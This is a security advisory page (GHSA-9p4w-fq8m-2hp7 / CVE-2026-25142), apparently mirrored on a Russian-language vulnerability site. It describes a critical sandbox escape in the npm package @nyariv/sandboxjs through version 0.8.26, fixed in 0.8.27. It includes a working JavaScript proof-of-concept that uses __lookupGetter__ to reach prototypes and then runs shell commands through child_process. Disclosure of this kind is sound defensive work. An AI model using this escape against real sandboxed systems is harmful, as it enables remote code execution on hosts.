GHSA-9p4w-fq8m-2hp7

Опубликовано: 02 фев. 2026

Источник: github

Github: Прошло ревью

CVSS3: 10

Описание

SandboxJS Vulnerable to Prototype Pollution -> Sandbox Escape -> RCE

Summary

SandboxJS does not properly restrict __lookupGetter__ which can be used to obtain prototypes, which can be used for escaping the sandbox / remote code execution.

Details

https://github.com/nyariv/SandboxJS/blob/f212a38fb5a6d4bc2bc2e2466c0c011ce8d41072/src/executor.ts#L368-L398

The Object prototype which contains __lookupGetter__ is properly protected, but the special case for accessing function properties bypasses the prototype chain checks including the root Object prototype.

PoC

const s = require("@nyariv/sandboxjs").default; const sb = new s(); payload = ` let getProto = Object.toString.__lookupGetter__("__proto__") let m = getProto.call(new Map()); m.has = isFinite; console.log( isFinite.constructor( "return process.getBuiltinModule('child_process').execSync('ls -lah').toString()", )(), );` sb.compile(payload)().run();

Impact

Prototype Pollution -> RCE

Ссылки

Пакеты

Наименование

@nyariv/sandboxjs

npm

Затронутые версииВерсия исправления

<= 0.8.26

0.8.27

EPSS

Процентиль: 25%

0.00085

Низкий

10 Critical

CVSS3

CVE ID

CVE-2026-25142

Дефекты

CWE-94

Связанные уязвимости

CVE-2026-25142

CVSS3: 10

nvd

6 дней назад

SandboxJS is a JavaScript sandboxing library. Prior to 0.8.27, SanboxJS does not properly restrict __lookupGetter__ which can be used to obtain prototypes, which can be used for escaping the sandbox / remote code execution. This vulnerability is fixed in 0.8.27.

EPSS

Процентиль: 25%

0.00085

Низкий

10 Critical

CVSS3

CVE ID

CVE-2026-25142

Дефекты

CWE-94